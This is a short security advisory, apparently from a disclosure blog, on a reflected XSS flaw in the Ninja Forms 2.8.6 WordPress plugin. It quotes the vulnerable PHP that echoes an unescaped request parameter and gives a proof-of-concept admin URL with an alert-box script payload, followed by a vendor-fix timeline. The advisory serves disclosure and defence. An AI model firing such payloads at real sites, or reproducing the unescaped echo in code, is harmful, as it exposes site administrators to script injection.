06-11-2014 / Vulnerabilities

Ninja Forms 2.8.6 Reflected XSS

$_REQUEST['update_message'] is not escaped.

File: ninja-forms\includes\admin\admin.php

if( !isset( $ninja_forms_admin_update_message ) AND isset( $_REQUEST['update_message'] ) ){
	$ninja_forms_admin_update_message = $_REQUEST['update_message'];
}
if( isset( $ninja_forms_admin_update_message ) AND $ninja_forms_admin_update_message != '' ){
	?>
	<div id="message" class="updated below-h2">
		<p>
			<?php echo $ninja_forms_admin_update_message;?>
		</p>
	</div>
	<?php
}

Proof of Concept

Reflected XSS is visible only for admin:

http://wordpress-instalation/wp-admin/admin.php?page=ninja-forms&update_message=%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E

Timeline

04-11-2014: Discovered
04-11-2014: Vendor notified
04-11-2014: Version 2.8.7 released, issue resolved

Vulnerabilities

Kallithea <= 0.3.4 Incorrect access control and XSS

This vulnerability allows a normal user to modify the permissions of repositories that he normally shouldn’t have access to.

12-12-2018

2 MIN READ

Vulnerabilities

Gitea 1.4.0 Unauthenticated Remote Code Execution

This is part 1 of 3 about bugs inside Gitea

05-07-2018

5 MIN READ

Vulnerabilities

ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution

How to create a Metasploit module in example?

28-06-2018

1 MIN READ